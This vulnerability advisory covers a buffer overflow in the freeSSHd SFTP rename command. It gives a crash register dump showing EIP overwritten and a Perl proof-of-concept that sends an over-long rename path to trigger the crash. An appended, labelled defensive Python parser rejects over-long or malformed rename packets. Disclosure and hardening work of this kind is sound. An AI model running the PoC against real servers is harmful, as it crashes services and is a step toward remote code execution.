SECURITYVULNS:DOC:20753
Oct 26, 2008 - 12:00 a.m.

freeSSHd (stf - rename) Buffer Overflow Vulnerability

vulners.com

freeSSHd (rename) Buffer Overflow Vulnerability

http://www.milw0rm.com/exploits/6800 <-- same vulnerability; this is further research on it

Registers at the time of the crash:

EAX 00000000
ECX 41414141
EDX 7C9037D8 ntdll.7C9037D8
EBX 00000000
ESP 001376BC
EBP 001376DC
ESI 00000000
EDI 00000000
EIP 41414141 <-- Pwned (EIP overwritten with 'AAAA' from the payload)

Part of the string is passed to various functions and eventually overwrites EIP.

In order to exploit it, some patching needs to occur. I've been trying to exploit this vulnerability on and off in my spare time.

0day for 3 months :)

Written by r0ut3r (writ3r [at] gmail.com)

#!/usr/bin/perl
# Proof of concept: sends an over-long path in an SFTP rename request to a
# freeSSHd server. The register dump above shows the result: the saved
# return address is overwritten and EIP holds bytes from the payload.
use strict;
use warnings;
use Net::SSH2;

my $user = "root";
my $pass = "yahh";

my $ip   = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
# The original had a bare string after ||, so a failed login was silently ignored; die instead.
$ssh2->auth_password($user, $pass) || die "[-] Incorrect credentials\n";
print "[+] Sending payload\n";

my $junk = 'A' x 317;   # filler that reaches the saved return address
my $eip  = 'BBBB';      # four marker bytes appended after the filler

# Build the payload before printing it (the original printed $payload before defining it).
my $payload = $junk . $eip;
print $payload, "\n";

my $sftp = $ssh2->sftp();
$sftp->rename($payload, 'B');   # old path = payload, new path = 'B'

print "[+] Sent\n";
$ssh2->disconnect;
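The register dump and the PoC above show what happens when a server copies an SFTP rename path into a fixed-size buffer without checking its length. The following is an added example, not part of the original advisory and not freeSSHd's code: a bounds-checked parser for the SFTP SSH_FXP_RENAME packet (type 18; layout uint32 length, byte type, uint32 request-id, string oldpath, string newpath, with each string encoded as uint32 length plus bytes, per draft-ietf-secsh-filexfer) that rejects truncated packets and any path longer than a configured limit. This is the kind of check an SFTP subsystem needs before handing a path to lower-level file functions. MAX_PATH_LEN (an assumed policy value), build_rename (used only to construct test input) and classify are my own names, not anything from the advisory or the product.

```python
import struct

SSH_FXP_RENAME = 18   # SFTP packet type for rename (draft-ietf-secsh-filexfer)
MAX_PATH_LEN = 260    # assumed policy limit for a single path; tune for the deployment


class MalformedPacket(ValueError):
    """Raised for any packet that would be unsafe or meaningless to process."""


def _read_string(buf, off):
    """Read an SFTP 'string' (uint32 big-endian length + bytes), checking it fits in buf."""
    if off + 4 > len(buf):
        raise MalformedPacket("truncated string length field")
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    if off + n > len(buf):
        raise MalformedPacket("string length %d exceeds packet" % n)
    return buf[off:off + n], off + n


def parse_rename(packet, max_path=MAX_PATH_LEN):
    """Parse one SSH_FXP_RENAME packet and return (request_id, oldpath, newpath).

    Every field is validated against the bytes actually present, and both paths
    are rejected if they exceed max_path, so an over-long path never reaches
    whatever consumes it downstream.
    """
    if len(packet) < 4:
        raise MalformedPacket("no length field")
    (length,) = struct.unpack_from(">I", packet, 0)
    if length != len(packet) - 4:
        raise MalformedPacket("declared length %d != actual %d" % (length, len(packet) - 4))
    if length < 5:
        raise MalformedPacket("too short for type and request id")
    ptype = packet[4]
    if ptype != SSH_FXP_RENAME:
        raise MalformedPacket("not SSH_FXP_RENAME (type %d)" % ptype)
    (req_id,) = struct.unpack_from(">I", packet, 5)
    oldpath, off = _read_string(packet, 9)
    newpath, off = _read_string(packet, off)
    if off != len(packet):
        raise MalformedPacket("trailing bytes after newpath")
    for name, path in (("oldpath", oldpath), ("newpath", newpath)):
        if len(path) > max_path:
            raise MalformedPacket("%s length %d exceeds limit %d" % (name, len(path), max_path))
    return req_id, oldpath, newpath


def build_rename(req_id, oldpath, newpath):
    """Encode a rename packet. Constructed here only to produce test input for the parser."""
    body = bytes([SSH_FXP_RENAME]) + struct.pack(">I", req_id)
    for path in (oldpath, newpath):
        body += struct.pack(">I", len(path)) + path
    return struct.pack(">I", len(body)) + body


def classify(packet, max_path=MAX_PATH_LEN):
    """Return 'ok' or 'reject: <reason>'; the string a hardened subsystem would log."""
    try:
        parse_rename(packet, max_path)
        return "ok"
    except MalformedPacket as exc:
        return "reject: %s" % exc


if __name__ == "__main__":
    # Constructed inputs: a normal rename, one with a 317-byte path like the
    # crash case above, and a packet cut short in transit.
    print(classify(build_rename(1, b"/tmp/a", b"/tmp/b")))
    print(classify(build_rename(2, b"A" * 317, b"B")))
    print(classify(build_rename(3, b"a", b"b")[:-3]))
```

SFTP runs inside the encrypted SSH channel, so this check belongs in the server's subsystem on the decrypted stream, not in a network IDS; the value of MAX_PATH_LEN should be whatever the server's own buffers and the host filesystem actually support.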